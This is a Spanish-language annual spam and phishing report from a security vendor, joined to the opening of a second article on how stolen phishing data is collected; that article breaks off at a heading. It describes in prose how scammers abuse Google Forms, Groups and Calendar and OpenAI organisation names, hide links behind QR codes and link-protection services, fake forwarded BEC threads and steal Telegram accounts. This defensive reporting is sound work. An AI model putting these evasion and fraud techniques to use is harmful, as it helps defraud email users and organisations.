La promoción en redes sociales con ayuda de LLM también podía despertar interés entre usuarios. Los estafadores ofrecían comprar para ese fin un conjunto de prompts especiales y, tras recibir el pago, desaparecían, dejando a las víctimas sin prompts y sin dinero.

La promesa de ganancias fáciles con ayuda de redes neuronales se convirtió en otra forma de atraer la atención de posibles víctimas. Los estafadores proponían usar ChatGPT para hacer apuestas y prometían que el usuario recibiría ingresos y el bot haría todo el trabajo. Estos servicios se ofrecían a un precio que se mantenía vigente durante 15 minutos desde que se abría la página. Ese plazo tan breve no le daba tiempo a la víctima potencial para reflexionar y lo inducía a hacer la compra impulsiva.

Vacantes con trampa

Los atacantes aprovecharon la demanda de empleo remunerado para atraer víctimas con ofertas de trabajo remoto bien pagado. Al responder a anuncios de este tipo, los postulantes no solo revelaban datos personales: en algunos casos, los estafadores solicitaban una pequeña suma con el pretexto de tramitar documentos o pagar una comisión. Para convencer a la víctima de la legitimidad de la oferta, los atacantes se hacían pasar por marcas reconocidas, atrayendo a los usuarios con nombres conocidos. Eso permitía bajar la guardia de las víctimas, incluso ante condiciones de empleo demasiado favorables.

También hubo casos en los que, tras obtener los datos de la víctima mediante un sitio de phishing, los estafadores la contactaban por teléfono, lo que podía llevar al usuario a revelar información personal adicional.

Tras estudiar tendencias del mercado laboral, los atacantes identificaron sectores laborales con alta demanda y los usaron como señuelo para robar credenciales de mensajeros. Los esquemas de phishing variaban según la región. Así, en los EAU se difundían recursos de “agencias de empleo”.

En un esquema más complejo, se pedía al usuario rellenar un formulario donde debía indicar el número de teléfono vinculado a su cuenta de Telegram.

Para completar el registro se requería un código que, en realidad, era un código de autorización de Telegram.

Es interesante que el proceso de registro no terminaba ahí: a la víctima le seguían solicitando datos para crear una cuenta en el recurso de phishing. Así, los usuarios seguían sin darse cuenta y mantenían la confianza en el sitio fraudulento.

Tras completar el registro, la víctima debía esperar 24 horas para “pasar la verificación”, pero los estafadores ya habían alcanzado su objetivo: robar la cuenta de Telegram.

Se observaron también esquemas de phishing más simples, donde se redirigía al usuario a una página que imitaba la interfaz de Telegram. Al ingresar el número de teléfono y el código de autorización, la víctima perdía acceso al mensajero.

No solo los mensajeros de los postulantes fueron atacados bajo la apariencia de ofertas de vacantes atractivas. Los objetivos de esquemas de phishing también fueron cuentas de empleadores, por ejemplo en un gran sitio de Rusia para buscar y ofrecer trabajo. En la página falsa se pedía a la víctima confirmar su cuenta para publicar una vacante; para ello se debía ingresar el usuario y la contraseña del sitio real.

El spam en 2025

Adjuntos maliciosos

Archivos comprimidos protegidos con contraseña

En 2024, los atacantes iniciaron campañas masivas de distribución de archivos comprimidos protegidos con contraseña que contenían malware. En 2025, los archivos comprimidos siguieron siendo un método popular de distribución de malware, y observamos diversas técnicas para ocultar archivos maliciosos frente a soluciones de seguridad.

Por ejemplo, los atacantes enviaban correos en nombre de firmas jurídicas, amenazando a las víctimas con un juicio por un presunto uso indebido de un nombre de dominio. Al destinatario se le proponía revisar posibles vías de conciliación previa al juicio, descritas en el documento adjunto. El adjunto contenía un archivo comprimido sin contraseña; en su interior, otro comprimido cifrado cuya contraseña se facilitaba en un documento aparte. En ese archivo, bajo la apariencia de un documento legal, había un archivo WSF malicioso que instalaba un troyano en el sistema mediante el inicio automático. Después, el troyano descargaba e instalaba Tor en segundo plano y lo utilizaba para exfiltrar capturas de pantalla del usuario hacia su servidor de comando y control (C2) en intervalos programados.

Además de archivos comprimidos, el año pasado también encontramos ocasionalmente documentos PDF protegidos con contraseña que incluían enlaces maliciosos.

Mensajes de servicios de firma electrónica de documentos

En 2025 se vieron con frecuencia mensajes que, con el pretexto de firmar un documento, obligaban a abrir un enlace de phishing o a abrir un adjunto malicioso. El esquema más común eran notificaciones falsas de servicios de firma electrónica de documentos. Se usaban con mayor frecuencia para ataques de phishing, aunque también es interesante un ejemplo malicioso de este esquema.

En el correo, que decía provenir de una plataforma conocida de intercambio de documentos, se notificaba al destinatario que se le había otorgado acceso a un contrato adjunto al mensaje. Sin embargo, en el adjunto no estaba el PDF anunciado, sino otro correo electrónico llamado “contrato”. El texto de ese mensaje era el mismo que el original y el adjunto contenía un archivo con doble extensión: un archivo SVG malicioso con un troyano disfrazado de documento PDF. Los estafadores, al parecer, intentaban ocultar el malware y evitar el bloqueo por una solución de seguridad.

“Correos de negocio” en nombre de empresas del sector manufacturero

En el verano del año pasado vimos envíos masivos hecho en nombre de varias empresas industriales reales. En los adjuntos de esos correos había archivos .docx que contenían troyanos. Los atacantes inducían a las víctimas a abrir el adjunto malicioso bajo el pretexto de continuar trabajando con el documento: firmar contratos o elaborar informes.

Los autores de esta campaña maliciosa intentaban bajar la guardia de los usuarios usando dominios reales de empresas del sector industrial en la dirección del remitente. Los mensajes se enviaban desde servidores de correo de proveedores cloud legítimos, lo que reforzaba su apariencia de autenticidad desde el punto de vista técnico. Así, incluso un usuario atento podía confundir el correo con uno auténtico, abrir el archivo adjunto e infectar su dispositivo.

Ataque contra hospitales públicos

El sector salud quedó bajo el foco de los atacantes el año pasado. A los hospitales les enviaban correos maliciosos en nombre de aseguradoras prestigiosas. A los destinatarios se les amenazaba con un proceso por supuesta prestación de servicios médicos de baja calidad. En los adjuntos había “documentos médicos y una solicitud del paciente afectado”, que en realidad eran malware. Nuestras soluciones detectan esta amenaza como Backdoor.Win64.BrockenDoor (un backdoor que recopila información sobre el dispositivo infectado y puede ejecutar comandos maliciosos).

También vimos correos con otra historia. En ellos se pedía a personal de una institución médica aceptar a un paciente de otro hospital para su observación y tratamiento. En esos mensajes también se hacía referencia a documentos médicos adjuntos con información sobre el diagnóstico y el tratamiento realizado, que en realidad eran archivos comprimidos con archivos maliciosos.

Para mayor credibilidad, los delincuentes no solo actuaban en nombre de conocidas compañías de seguros y establecimientos médicos, sino que también creaban dominios de correo similares a los dominios reales de las organizaciones correspondientes, añadiendo palabras como “-insurance”, “-med”, etc. Además, para adormecer la vigilancia de sus víctimas, los estafadores utilizaban una etiqueta falsa indicando que el correo había sido verificado por una solución de protección de correo electrónico.

Mensajes con instrucciones para ejecutar scripts maliciosos

El año pasado vimos escenarios poco comunes de infección de dispositivos objetivo con malware. Así, los atacantes siguieron difundiendo por correo instrucciones para descargar y ejecutar código malicioso en lugar de enviar los archivos. Para convencer al destinatario de cumplir los pasos indicados, lo más frecuente era que los atacantes usaran como pretexto una actualización de un programa o del sistema, por ejemplo para corregir una vulnerabilidad detectada. El procedimiento habitual comenzaba con la ejecución de la consola con privilegios de administrador, seguida de un comando que descargaba y ejecutaba malware, ya fuera un script o un binario.

En algunos casos, la instrucción estaba en un archivo PDF, y se sugería a la víctima copiar en PowerShell un comando que no estaba ofuscado ni oculto. Estos esquemas apuntan a usuarios sin formación técnica, quienes al desconocer el propósito del comando lo ejecutaban sin sospechas, descargando el malware en su dispositivo.

Estafa

Correos en nombre de la policía en el sector ruso de Internet

En 2025, las estafas de extorsionadores que se presentan como fuerzas del orden, que antes observábamos con más frecuencia en países de Europa, empezó a adaptarse a los usuarios de países de la CEI.

Por ejemplo, encontramos mensajes con notificaciones sobre la apertura de un caso penal, enviados supuestamente por la policía rusa. Sin embargo, las unidades policiales mencionadas en el correo nunca existieron en Rusia. El contenido de la citación también podía hacer que un usuario atento dudara de su legitimidad, ya que se acusaba al destinatario de cometer acciones ilegales, por ejemplo ver materiales prohibidos. Esta extorsión se basaba en inducir pánico en la víctima, para que no verificara lo escrito en la citación falsa.

Para intimidar al destinatario, los atacantes citaban citaban leyes, añadían firmas de responsables y sellos de fuerzas del orden. En realidad, ni las leyes ni los cargos indicados existen en Rusia.

Vimos ataques similares con fuerzas del orden inexistentes y actos normativos ficticios en otros países de la CEI, como en Bielorrusia.

Envíos masivos disfrazados de proyectos de inversión

Los atacantes siguieron usando de forma activa el tema de las inversiones en los envíos masivos de scam. En estos correos se suele promete un ingreso estable y que no necesita de presencia personal gracias a proyectos de inversión. Estos envíos son uno de los tipos más masivos y variables de scam por correo. Los atacantes añadían enlaces fraudulentos tanto en el texto del mensaje como en varios adjuntos: PDF, DOC, PPTX, PNG; además usaban para el envío servicios de Google, como Docs, YouTube y Forms. Al abrir el enlace, la víctima llegaba la página web fraudulenta del “proyecto”, donde le solicitaban el número de teléfono y el correo electrónico. Después, le proponían invertir en un proyecto inexistente.

Ya hemos escrito sobre estos envíos. Antes, apuntaban a usuarios rusoparlantes y se enviaban usando sobre todo el nombre de grandes organizaciones financieras. Sin embargo, en 2025 el esquema de inversiones falsas también se empezó a usar en otros países de la CEI y de Europa, y se amplió el espectro de actividades de las empresas que los spammers imitaban. Por ejemplo, en sus correos los atacantes proponían invertir en proyectos de grandes empresas del sector manufacturero de Kazajistán y Chequia.

Búsqueda de socios para marcas conocidas

Este esquema fraudulento incluía varias etapas. Primero, la empresa (posible víctima) recibía un mensaje de un representante de una marca conocida con una propuesta para registrarse como proveedor y convertirse en socio. Luego, para dar más credibilidad, los atacantes enviaban a la víctima numerosos documentos falsos y, tras su firma, pedían un depósito que, según prometían, se devolvería por completo tras establecer la asociación.

Estos correos se detectaron por primera vez en 2025 y se convirtieron en uno de los tipos más extendidos de scam por correo. Solo en diciembre de 2025, se bloquearon más de 80 000 mensajes de este tipo. Los envíos se dirigían al sector B2B y se distinguían por su variedad, desde sus propiedades técnicas hasta la variación del texto y el número de marcas en cuyo nombre actuaban los atacantes.

Correos bajo la apariencia de pago de deuda por renta de inmuebles

El año pasado detectamos un nuevo tema en los envíos masivos de scam, en el que el destinatario recibía una notificación sobre el vencimiento del plazo de pago del local rentado y se le exigía pagar la deuda lo antes posible. Para que la víctima no enviara fondos al arrendador real, el correo también informaba sobre un cambio de datos bancarios: el “deudor” debía solicitar los nuevos, que, por supuesto, pertenecían a los estafadores. Estos envíos apuntaban sobre todo a países francófonos, pero en diciembre de 2025 también detectamos un ejemplo de este scam en alemán.

Uso de códigos QR en el fraude

En 2025 empezamos a ver códigos QR no solo en mensajes de phishing, sino también en correos de scam de extorsionadores. En el esquema clásico de chantaje por correo, se suele intimidar al usuario con la idea de que hackers obtuvieron acceso a datos confidenciales. Para que la información personal de la víctima no se publique, los atacantes exigen transferir una suma a un monedero de criptomonedas.

Antes, para evitar el bloqueo de estos correos por filtros, los estafadores intentaban disfrazar la dirección del monedero con varias técnicas de ofuscación. En los envíos del año pasado, los estafadores empezaron a añadir un código QR que contenía la dirección del monedero.

Uso de temas candentes

Como en periodos anteriores, en 2025 los spammers integraron de forma sistemática noticias de actualidad en sus mensajes engañosos

Por ejemplo, tras el lanzamiento de memecoins $TRUMP, vinculados a la toma de posesión de Donald Trump, vimos mensajes de scam sobre el lanzamiento de Trump Meme Coin y Trump Digital Trading Cards. En ellos, los estafadores ofrecían a las víctimas abrir un enlace para obtener NFT gratis.

En primavera, antes del período de exámenes finales, detectamos mensajes sobre la venta de documentos educativos falsos. Los spammers insertaban anuncios fraudulentos como comentarios en foros antiguos sin moderación activa, aprovechando las notificaciones automáticas para alcanzar a todos los suscriptores del hilo. Estos mensajes o bien mostraban de inmediato el contenido del comentario con el enlace fraudulento, o bien avisaban de una nueva publicación, cuyos enlaces llevaban a sitios que vendían documentos falsos.

En verano, cuando uno de los temas más sonados fue la boda del fundador de Amazon Jeff Bezos, se empezó a enviar a los usuarios mensajes de estafas nigerianas, tanto en nombre del propio Bezos como en nombre de su ex esposa MacKenzie Scott. En estos correos se le prometía al destinatario una suma importante de dinero como donación o compensación por parte de Amazon.

Durante la gira mundial del grupo BLACKPINK apareció spam con publicidad de maletas-scooter. Según los estafadores, en esas maletas eléctricas se desplazaban las integrantes del grupo durante el concierto.

En otoño de 2025, como es tradicional durante la presentación del nuevo modelo de iPhone, detectamos mensajes fraudulentos con encuestas que supuestamente permitían ganar un iPhone 17 Pro al responderlas.

Tras completar un breve cuestionario, el usuario debía indicar sus datos de contacto y dirección, y también pagar el costo de envío, que era el objetivo principal de los estafadores. Tras ingresar los datos bancarios en el sitio falso, la víctima podía perder no solo una suma pequeña por el envío, sino todos los fondos almacenados en su cuenta.

La popularidad de “Ozempic” también se reflejó en envíos masivos de spam: a los usuarios se les ofrecía con insistencia comprar un medicamento falso o sus análogos dudosos.

Las noticias más locales también entran en el campo de atención de los estafadores y se convierten en historias en envíos de scam. Por ejemplo, en el verano del año pasado, con la apertura de la temporada fiscal y el inicio de la presentación de declaraciones en Sudáfrica, empezamos a registrar correos de phishing en nombre del Servicio de Impuestos de Sudáfrica (SARS), que notificaban a contribuyentes sobre la necesidad de pagar una deuda.

Métodos de envío de amenazas por correo

Servicios de Google

En 2025, los atacantes difundieron amenazas por correo mediante varios servicios de Google con más frecuencia que antes. Así, observamos el uso de Google Calendar: los estafadores creaban una reunión, en su descripción indicaban un número para contactar en WhatsApp y enviaban la invitación a la víctima. Por ejemplo, a empresas se les enviaban correos con solicitudes de productos y se les proponía pasar al mensajero para seguir negociando una colaboración.

De la misma forma actuaban los spammers que usaban el servicio Google Classroom. Vimos ejemplos con ofertas de servicios de optimización SEO de sitios, donde se indicaba un número de WhatsApp para entrar en contacto.

También registramos la distribución de enlaces fraudulentos mediante notificaciones legítimas de YouTube. Los atacantes respondían a comentarios de usuarios bajo varios videos, y como resultado la víctima recibía un correo sobre una nueva respuesta. En él se indicaba un enlace al video, que contenía solo un mensaje que invitaba a mirar la sección de descripción; ahí estaba el enlace al sitio fraudulento. El usuario recibía por correo el texto completo de ese comentario y podía seguir la cadena de enlaces, y al final llegaba a un recurso de scam.

En los últimos años ha crecido el número de ataques fraudulentos mediante Google Forms. En ellos, los estafadores creaban una encuesta con un título atractivo e insertaban el texto fraudulento en su descripción. Luego llenaban su propio formulario y, en el campo de correo del encuestado, ingresaban direcciones de las víctimas. A esas direcciones les llegaban notificaciones reales de Google Forms sobre un formulario completado. Para los filtros de correo parecían legítimas, ya que se enviaban desde servidores de correo de Google. El cálculo de los atacantes era que la víctima no prestara atención al encabezado del formulario, sino a la descripción señuelo, que contenía el enlace fraudulento.

El servicio Google Groups también fue una herramienta popular de distribución de spam el año pasado. Los estafadores creaban un grupo, añadían las direcciones de correo de sus víctimas como participantes y difundían spam mediante el servicio. El esquema resultó bastante eficaz: incluso si una solución de seguridad bloqueaba el correo spam inicial, al usuario le llegaba una gran cantidad de respuestas automáticas desde direcciones que también estaban en esa lista de participantes.

A finales de 2025 detectamos un correo electrónico de Google completamente legítimo desde el punto de vista técnico, pero que contenía un enlace fraudulento. El correo también contenía un código de confirmación para la verificación del correo del destinatario. Los estafadores manipulaban el formulario de registro de cuentas para redirigir la atención del destinatario hacia el sitio fraudulento. Por ejemplo, en lugar del nombre y apellido del usuario, insertaban el texto “Enlace personal” y el enlace fraudulento, usando técnicas de ofuscación. Así, en el ejemplo descrito, cambiaban la barra inclinada por una barra invertida y añadían ese mismo símbolo antes del URL. En el campo para ingresar el correo electrónico, indicaban la dirección de la víctima y, de este modo, al usuario le llegaba una notificación legítima con un enlace al recurso de scam.

OpenAI

Además de los servicios de Google, los spammers usaron otras herramientas para enviar amenazas por correo, como la plataforma OpenAI, en un intento de aprovechar el auge de la inteligencia artificial. En 2025 vimos correos legítimos enviados por esta plataforma, donde los spammers añadían mensajes breves a sus víctimas, además de enlaces o números de teléfono fraudulentos.

La cuestión es que, al registrarse en la plataforma OpenAI, a los usuarios se les pide crear una organización para poder generar una clave API. En el campo para ingresar el nombre de la organización, los spammers colocaban el contenido fraudulento. Luego añadían los correos de las víctimas como participantes de la organización; de este modo, les llegaban mensajes con enlaces o números de teléfono fraudulentos.

Phishing selectivo y ataques BEC en 2025

Códigos QR

Los códigos QR en phishing dirigido son un esquema que ya se volvió habitual y que los atacantes siguieron usando en 2025. En particular, vimos que se conservó una de las principales tendencias en el envío de documentos de phishing descrita en nuestro informe anterior: disfrazarse como notificaciones del Departamento de Recursos Humanos de empresas.

En estos correos, los atacantes, haciéndose pasar por especialistas de RRHH, pedían al empleado leer ciertos documentos, por ejemplo, una nueva política de la empresa o reglas de orden laboral interno. Los documentos estaban adjuntos al correo en formato PDF.

Mensaje de phishing con una nueva política de la empresaSiguiendo la historia, el documento PDF contenía un llamado bastante convincente para escanear un código QR y obtener acceso al archivo. Anteriormente, los códigos QR aparecían en el cuerpo del mensaje; en 2025 los atacantes priorizaron su inclusión en adjuntos PDF, probablemente para evadir filtros de correo.

Contenido del archivo PDF adjunto

Al escanear el código QR del adjunto, la víctima llegaba a una página de phishing estilizada como un formulario de inicio de sesión de Microsoft.
Página de phishing con formulario de inicio de sesión

Página de phishing con formulario de inicio de sesión

Además de mensajes falsos de HR, los atacantes creaban reuniones en el calendario de correo y, en su descripción, colocaban archivos DOC o PDF que contenían códigos QR. El uso del calendario para distribuir enlaces fraudulentos es una técnica antigua que era muy frecuente en los ataques de spam de 2019. Durante varios años no vimos campañas de este tipo, pero el año pasado los atacantes volvieron a usar esta técnica, esta vez en el phishing selectivo complejo.

Invitación falsa a una reunión

En el ejemplo descrito, el adjunto era una notificación de un nuevo mensaje de voz. Para escucharlo, el usuario debía escanear el código QR e iniciar sesión en su cuenta en la página que aparecía.

Contenido del archivo adjunto

Como en el guion anterior, al escanear el código el usuario llegaba a una página de phishing, donde podía perder el acceso a la cuenta de Microsoft o a un recurso corporativo.

Servicios Link Protection

Para ocultar enlaces de phishing y evadir verificaciones, los atacantes no solo usaron códigos QR. Descubrimos que en 2025 los estafadores empezaron a usar para este fin servicios de protección contra enlaces maliciosos y de phishing (link protection). Estos servicios están diseñados para analizar enlaces al abrirlos y bloquear el acceso a recursos maliciosos antes de que infecten el dispositivo. Los atacantes abusan de esta tecnología, generando enlaces de phishing que el sistema percibe como seguros.

Esta técnica se usa tanto en phishing masivo como en phishing selectivo. En este último puede ser muy peligrosa, ya que en los envíos selectivos suelen usarse datos personales de empleados y un diseño que imita correos reales de la empresa. En conjunto con estas características, un enlace creado con un servicio de protección de enlaces puede dar más credibilidad a un correo de phishing.

Enlace “protegido” en un correo de phishing

Al abrir el URL que parecía seguro, el usuario llegaba a un sitio de phishing.

Página de phishing

BEC y correspondencia ficticia

En ataques BEC, los atacantes también empezaron a usar nuevas técnicas, y la más interesante de ellas son los mensajes reenviados falsos.

Correo BEC con reenvío de una cadena de mensajes

Este ataque BEC se desarrollaba de esta forma. A un empleado le llegaba un correo que contenía correspondencia previa del remitente con otro colega. El último correo de la cadena suele ser una respuesta automática de ausencia o una solicitud para transferir la tarea a un nuevo responsable. La clave del engaño radicaba en que toda la cadena de mensajes previos era falsa: carecía de encabezados técnicos como thread-index que certificaran su autenticidad.

En el ejemplo analizado, la víctima debía pagar con urgencia una licencia usando los datos bancarios indicados. Los adjuntos PDF del correo eran una instrucción para transferir fondos y una carta de acompañamiento del banco.

Contenido del documento PDF adjunto

Sin embargo, en la dirección indicada el banco no tiene ninguna oficina.

Estadísticas: phishing

En 2025, las soluciones de Kaspersky bloquearon 554 002 207 intentos de abrir enlaces fraudulentos. A diferencia de la dinámica de años anteriores, no vimos períodos pico de actividad de phishing y el número de ataques se mantuvo cerca de un mismo nivel durante el año, salvo una ligera caída en diciembre.

Número de activaciones del sistema Antiphishing, 2025 (descargar)

El panorama del phishing y las estafas ha cambiado. Los ataques masivos predominaron en 2024, pero su volumen cayó en 2024. Por su parte, los esquemas basados en redirecciones múltiples, táctica habitual en 2024, perdieron relevancia en 2025.

Geografía de los ataques de phishing

Como el año anterior, el país con el mayor porcentaje de usuarios que sufrieron ataques de phishing sigue siendo Perú (17,46%). El segundo lugar lo ocupa Bangladés (16,98%), que por primera vez entró en el TOP 10, y el tercero, Malaui (16,65%), que no figuraba en el ranking de 2024. Luego vienen Túnez (16,19%), Colombia (15,67%), que antes tampoco aparecía en el TOP 10, Brasil (15,48%) y Ecuador (15,27%). Tras ellos, con una diferencia pequeña, siguen Madagascar y Kenia con la misma proporción de usuarios atacados: 15,23%. Con un 15,05%, cierra el ranking Vietnam, que antes ocupaba el tercer lugar.

** Proporción de usuarios que se enfrentaron a phishing, del total de usuarios de Kaspersky en el país o territorio, 2025

Dominios de nivel superior

En 2025, a diferencia de la tendencia observada en los últimos años, la mayoría de las páginas de phishing se alojaron en la zona de dominio XYZ, con un 21,64 %, lo que triplica el porcentaje registrado en 2024. En segundo lugar se posicionó el dominio TOP con el 15,45%, seguido por BUZZ con el 13,58%. Esta popularidad se explica por el bajo costo de registrar un sitio web en esos dominios. En cuarto lugar quedó el dominio COM (10,52 %), que hasta ahora siempre había encabezado el ranking. Cabe señalar que esta disminución se debe en parte a la popularidad de ataques con typosquatting: no es raro que los atacantes falsifiquen sitios en el dominio COM (por ejemplo, example-com.site en lugar de example.com). Tras COM sigue la zona BOND, que por primera vez entró en el TOP con 5,56%. Por lo común, en ella hay recursos sobre temas financieros, lo que explica el aumento del interés de los atacantes por registrar páginas de phishing en esa zona. En sexto y séptimo lugar quedaron ONLINE (3,39%) y SITE (2,02%), que en 2024 ocupaban el cuarto y quinto puesto, en ese orden. Además, tuvieron popularidad tres zonas que no aparecían antes en nuestra estadística. No referimos a CFD (1,97%), que se usa para recursos en áreas de ropa, moda y diseño; el dominio nacional de Polonia PL (1,75%); y la zona LOL (1,60%).

Zonas de dominio de nivel superior que alojaron la mayoría de las páginas de phishing, 2025 (descargar)

Organizaciones blanco de ataques de phishing

La clasificación de las organizaciones atacadas por los phishers se basa en la activación del componente determinista del sistema Antiphishing en los equipos de los usuarios. Este componente detecta las páginas con contenido phishing que el usuario intentó visitar siguiendo enlaces en mensajes o en Internet, si los enlaces a estas páginas aún no estaban disponibles en las bases de datos de Kaspersky.

Las páginas de phishing que fingía ser servicios web (27,42%) y portales globales de Internet (15,89%) mantuvieron sus posiciones dominantes en el TOP 10, ocupando el primer y segundo lugar respectivamente. Las tiendas en línea, que son un objetivo habitual de los atacantes, volvieron al tercer lugar con un 11,27%. En 2025, creció el interés de los phishers por usuarios de juegos en línea: sitios que fingen ser de juegos subieron del noveno al quinto lugar del ranking (7,58%). Les siguen los bancos (6,06%), los sistemas de pago (5,93%), los mensajeros (5,70%) y los servicios de entrega a domicilio (5,06%). También se dirigieron ataques de phishing a cuentas en redes sociales (4,42%) y en servicios gubernamentales (1,77%).

Distribución por categoría de organizaciones cuyos usuarios fueron atacados por phishers, 2025 (descargar)

Estadísticas: spam

Porcentaje de spam en el tráfico de correo

Durante 2025, el spam representó en promedio el 44,99% del tráfico mundial de correo electrónico, lo que implica una reducción de 2,28 puntos porcentuales respecto a 2024. Es llamativo que, a diferencia de la tendencia histórica, el cuarto trimestre fuese el más activo: en promedio, 49,26% de los correos fueron spam, con un período de mayor actividad que se dio en noviembre (52,87%) y diciembre (51,80%). En el resto del año, la distribución de correos basura fue bastante uniforme, sin picos marcados: la proporción promedio de spam se mantuvo en 43,50%.

Porcentaje de spam en el tráfico de correo en 2025 (descargar)

En el segmento ruso de Internet observamos una caída mayor: el promedio de spam bajó 5,3 p. p. y quedó en 43,27%. A diferencia de la tendencia mundial, el cuarto trimestre fue el más tranquilo con 41,28%. La menor actividad de spam se registró en diciembre: ese mes solo 36,49% de los correos fueron basura. Enero y febrero también fueron más tranquilos, con promedios respectivos del 41,94% y 43,09%. En cambio, los indicadores de marzo a octubre en el Runet se alinearon con los globales: en esos meses no hubo picos de actividad, y en promedio los correos spam representaron el 44,3% del tráfico total.

Porcentaje de spam en el tráfico de correo en 2025 (descargar)

Países y territorios fuentes de spam

Los tres primeros países del ranking de 2025 por volumen de spam enviado mantienen el mismo orden que el año anterior: Rusia, China y Estados Unidos. Sin embargo, la proporción de spam enviado desde Rusia bajó de 36,18% a 32,50%, y las proporciones de China (19,10%) y Estados Unidos (10,57%), por el contrario, crecieron (2 p. p. cada una). Alemania, que ocupaba el sexto lugar, subió al cuarto (3,46%) desplazanado a Kazajistán (2,89%). En el sexto lugar quedó Hong Kong (2,11%). Luego siguen los Países Bajos y Japón con 1,95% cada uno; en Países Bajos se observa un crecimiento del volumen de spam respecto del año anterior, y en Japón, un descenso. Cierran el TOP Brasil (1,94%) y Bielorrusia (1,74%), que por primera vez entró en el ranking.

TOP 20 países y territorios fuentes de spam, 2025 (descargar)

Adjuntos de correo maliciosos

En 2025, las soluciones de Kaspersky bloquearon 144 722 674 de archivos adjuntos maliciosos en correo electrónico, cifra que supera en 19 millones las detecciones registradas en 2024. Los periodos de menor incidencia se registraron en los extremos del año (enero-febrero y noviembre-diciembre), con una baja observada durante agosto y septiembre. Los picos por número de detecciones del antivirus de correo se dieron en junio, julio y noviembre.

Número de detecciones del antivirus para correo electrónico, 2025 (descargar)

Los adjuntos de correo malicioso más comunes en 2025 fueron los troyanos Makoob, que recopilan de forma oculta información del sistema y credenciales del usuario. Aparecieron por primera vez en el TOP 10 en 2023, en el octavo lugar; un año después subieron al tercero, y en 2025 ocuparon el primer lugar con un 4,88%. Detrás de ellos, al igual que el año anterior, quedó la familia de troyanos Badun (4.13%), que se disfrazan de documentos electrónicos. En tercer lugar se encuentra la familia Taskun (3.68%), que crea tareas programadas maliciosas, y en cuarto lugar los stealers Agensla (3.16%), que en 2024 fueron los adjuntos maliciosos más comunes. Cierran el listado los scripts Trojan.Win32.AutoItScript, que representan el 2,88 % del total y hacen su primera aparición en el ranking. En sexto lugar quedó el spyware Noon para sistemas Windows de cualquier tipo (2,63%), y en el décimo, el mismo, pero dirigido solo a sistemas de 32 bits (1,10%). Además, en el TOP 10 entraron los archivos adjuntos HTML de phishing Hoax.HTML.Phish (1.98%), los cargadores Guloader (1.90%) que nunca habían estado en el ranking, y los documentos PDF con enlaces dudosos, Badur (1.56%).

TOP 10 familias de malware distribuidas como adjuntos de correo, 2025 (descargar)

La distribución de malware, como de costumbre, casi por completo repite la distribución de familias maliciosas. Las diferencias se reducen a que una variante del stealer Agensla quedó no en cuarto, sino en sexto lugar con 2,53%, y las muestras Phish (1,58%) y Guloader (1,78%) intercambiaron posiciones. En el último lugar del ranking quedó el ladrón de contraseñas Trojan-PSW.MSIL.PureLogs.gen con el 1,02%.

TOP 10 de malware distribuido como adjuntos de correo, 2025 (descargar)

Países y territorios objetivos de los correos maliciosos

El mayor número de adjuntos de correo maliciosos se bloqueó en dispositivos de usuarios de China: 13,74%. Rusia, por primera vez en dos años, bajó al segundo lugar con un 11,18%. Luego, con una diferencia pequeña entre sí, siguen México (8,18%) y España (7,70%), que intercambiaron posiciones en comparación con el año anterior. El número de detecciones del antivirus de correo subió de forma leve en Turquía (5,19%); el país se mantuvo en el quinto lugar. El sexto y séptimo lugar los ocupan Vietnam (4,14%) y Malasia (3,70%); ambos subieron en el TOP gracias al aumento de su proporción de detecciones. Les siguen los EAU (3,12%), sin cambios de posición. También entraron en el TOP 10 Italia (2,43%) y Colombia (2,07%).

TOP 20 países y territorios, objetivos de envíos maliciosos, 2025 (descargar)

Conclusión

Es muy probable que el próximo año se caracterice por nuevas formas de abuso de las capacidades de la inteligencia artificial. Las credenciales de mensajeros seguirán siendo un botín muy deseado por los atacantes. La posible aparición de nuevos esquemas no excluye el uso de trucos y métodos ya conocidos; esto significa que, además de usar software confiable, hace falta estar atentos y tratar con cuidado cualquier propuesta en la red que despierte aunque sea una sospecha mínima.

El creciente interés de los ciberdelincuentes por las credenciales de los portales de servicios gubernamentales indica un mayor riesgo de daño: el acceso a estos servicios puede derivar en el robo de dinero, datos e identidad. Se han vuelto más frecuentes los abusos de herramientas legítimas y los ataques en varias etapas, que comienzan con archivos o enlaces aparentemente inofensivos; todo indica que los estafadores buscan bajar la guardia de los usuarios para alcanzar sus objetivos maliciosos.

Introducción

Por lo general, un ataque de phishing (suplantación de identidad) consiste en que el usuario hace clic en un enlace malicioso e ingresa sus credenciales en un sitio fraudulento. Pero en realidad el ataque no se limita a eso. En el momento en que la información confidencial cae en manos de los atacantes, se convierte en un bien negociable y empieza su recorrido por el mercado clandestino.

En este artículo, trazaremos el camino de los datos robados, desde su recopilación mediante diversas herramientas como bots de Telegram y paneles de control avanzados, hasta su venta y posterior reutilización en nuevos ataques. Veremos cómo un nombre de usuario y una contraseña, tras ser filtrados, pasan a formar parte de un voluminoso expediente digital y por qué los atacantes pueden utilizar incluso filtraciones antiguas para lanzar ataques selectivos años después de que los datos se vieran comprometidos.

Mecanismos de recopilación de datos en los ataques de phishing

Antes de poder rastrear el destino de los datos robados, debemos comprender cómo salen de la página de phishing y llegan a manos de los estafadores.

Para ello, hemos analizado páginas reales de phishing y destacado las formas más comunes de enviar datos:

• Envío a un correo electrónico
• Envío a un bot de Telegram
• Envío a un panel de control

Además, vale decir que los atacantes pueden utilizar servicios legítimos para recopilar datos y dificultar la detección de sus servidores. Estos pueden ser, por ejemplo, formularios en línea de Google Forms, Microsoft Forms, etc. Asimismo, los repositorios en GitHub, los servidores Discord y otros recursos pueden actuar como depósito de datos robados. En este estudio, nos centraremos en las principales formas de recopilación de datos.

Correo electrónico

Los datos que se introducen en un formulario HTML de una página de phishing se envían al servidor del atacante a través de un script PHP, que los reenvía a una dirección de correo electrónico bajo su control. Hay que tener en cuenta que este método se utiliza cada vez con menos frecuencia en los ataques debido a una serie de limitaciones de los servicios de correo electrónico: por ejemplo, los retrasos en la entrega del correo electrónico, la probabilidad de bloqueo por parte del proveedor de alojamiento y la inconveniencia de procesar grandes cantidades de datos.

Tomemos como ejemplo un kit de phishing dirigido a usuarios de DHL.

Contenido del phishkit

El archivo index.php contiene un formulario de phishing que recopila datos del usuario: en este caso, la dirección y contraseña de correo electrónico.

Formulario de phishing idéntico al sitio web de DHL

Los datos introducidos por la víctima en este formulario se envían a través de un script en el archivo next.php a la dirección de correo electrónico especificada en el archivo mail.php.

Contenido del script PHP

Bots de Telegram

